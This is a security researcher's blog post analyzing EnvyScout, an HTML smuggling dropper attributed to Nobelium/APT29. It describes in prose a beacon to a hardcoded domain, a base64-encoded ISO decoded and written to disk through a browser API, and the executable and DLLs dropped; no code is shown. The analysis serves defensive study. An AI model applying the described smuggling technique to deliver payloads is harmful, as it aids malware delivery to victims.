🙄
p1k4chu@p1k4chu-host
  • About Me
  • Tools
    • Defensive Tools
      • H0neyTr4p
    • Offensive Tools
      • Ransomware Simulator - PyRan
  • Security Research
    • AI Security Research
      • Attacking using (and defending against) Input manipulation attacks against AI
      • (Ab)using AI to attack M365 and other services to conduct plethora of attacks
    • Cloud Security Research
      • Azure Storage Account Security - Attack & Defend: Part 1
      • Attack and Defend Azure Serial Console - Part 1
      • Azure Serial Console Attack and Defense - Part 2
    • Adversarial Tradecraft Research & Detection
      • RDP Exfil - The technique that works almost every time
      • Smishing Traid targets India with large scale "India Post" themed iMessage phish texts
      • Quick Assist: Friend or Foe? How adversaries can exploit this tool and how can you defend?
      • EDR Silencer - Embracing the Silence
      • Dissecting & Detecting Lsass Shtinkering
      • Detecting malicious OOB: Part -1: Hunting for OOB server - Interact.sh
      • Abusing Windows VPN for EXFIL
      • Analyzing Nobelium's HTML Dropper - EnvyScout
    • Web & Mobile App Sec
      • [CVE-2015-2300] ENL-Newsletter CSRF Full Disclosure
      • Yandex Mobile App vulnerable to Insecure Data storage
      • Bug on paypal worth 1000$
      • Session fixation bug on coinbase.
      • CyanogenMod (In)Secure Folder Lock !
  • Security Talk
    • Review of CRTP - Pentester Academy
    • Review of Hacking and Securing Kubernetes
Powered by GitBook
On this page
  • Analysis Summary:
  • Analysis In-Detail:

Was this helpful?

  1. Security Research
  2. Adversarial Tradecraft Research & Detection

Analyzing Nobelium's HTML Dropper - EnvyScout

TL;DR; In a recent incident, Nobelium (APT-29) used a HTML dropper to download a file and store it on the disk;

PreviousAbusing Windows VPN for EXFILNextWeb & Mobile App Sec

Last updated 1 year ago

Was this helpful?

Recently, I got my hands on a malware sample used by Nobelium / APT29 and wanted to use this opportunity to learn and revise my malware analysis skills

Please review my work and provide feedback at my n00b-ish attempt at Malware analysis

Analysis Summary:

  • [ASSUMPTION] Attacker sends a malicious HTML file or a link to the victim

  • [ASSUMPTION] Victim opens the file

  • There's a hardcoded string (~2.8 MB) that's converted from base64 to an Array Buffer

  • This array buffer (which is an ISO file) is written onto disk using Inbuilt API calls

  • This ISO file contains 3 files: an exe and 2 DLLs. While these were interesting, it's a story for another day.

Analysis In-Detail:

At the first look, the HTML dropper looks to be built in a not-so-sophisticated way as we encounter a malicious domain where the malware is communicating. What's more eye-popping for a malware analyst than a malicious domain hardcoded in a malware

Moving On, they seem to be sending a beacon-ping (kind off like a Hi, someone clicked me) to their malicious URL along with the IP of the user and the user agent. I'm not sure why they were sending a request to IPIFY. I assume they wanted to get the current IP of the user but they're not really utilizing it. Seems like unfinished code (not surprised). However, this seems to be just a function and we'll have to see when this is actually called.

Further down, there seems to be a string (~2.8 MB) which is base64 encoded.

Below that is the function which is kind off the one which does all the magic; Again, not a JS expert but looks like they copied yet another code and this time from StackOverflow.

Combining both the pieces together, it looks like the JS is trying to put the base64 string into an array buffer and write to the disk using the previously discovered function. Dynamic analysis indicates that it's an ISO file containing possibly malicious samples.

This looks like a previously documented variant

  • https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

  • https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/

References:

  • https://digital.nhs.uk/cyber-alerts/2021/cc-3878

  • https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage

  • https://blog.sekoia.io/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/

Analyzing the code deeply, the first function is taking an input text and using the "window.navigator.msSaveOrOpenBlob" API call to download a file. Now, I'm not a JS expert by any means but I can do good googl-ing (if that's even a word, lol) and looks like our folks have taken some inspiration (pun intended) from CodePen. After all, they are like normal developers who love copying code from online

There seems to 2 DLLs and 1 Exe that were dropped as a part of the malware package. Looks interesting and will definitely keep me occupied after work

😂
🥷
😄
😄
😂
Nobelium's HTML loader
Code on Code Pen
Malware Sample Analysis
Malware Sample
Code on Stack Overflow
The malicious ISO file
Contents of the malicious ISO